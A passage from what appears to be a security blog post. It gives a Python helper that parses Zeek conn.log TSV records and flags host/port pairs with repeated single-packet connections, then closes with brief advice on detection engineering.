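            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split("\t")))


def single_packet_pairs(records, min_count=10):
    """Count connections with orig_pkts == resp_pkts == 1 per (orig_h, resp_h, resp_p)
    and keep the pairs that repeat at least min_count times."""
    counts = Counter(
        (r["id.orig_h"], r["id.resp_h"], r["id.resp_p"])
        for r in records
        if r.get("orig_pkts") == "1" and r.get("resp_pkts") == "1"
    )
    return {pair: n for pair, n in counts.items() if n >= min_count}
```

A typical use is `with open("conn.log") as fh: print(single_packet_pairs(read_zeek_tsv(fh)))` on an uncompressed TSV log. Zeek's JSON output would need a JSON reader instead.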

Final word

Great security teams ship detections and iterate through hunts. Make telemetry trustworthy, codify behaviors, test relentlessly, and measure outcomes. Everything else is noise.

— CyberDudeBivash
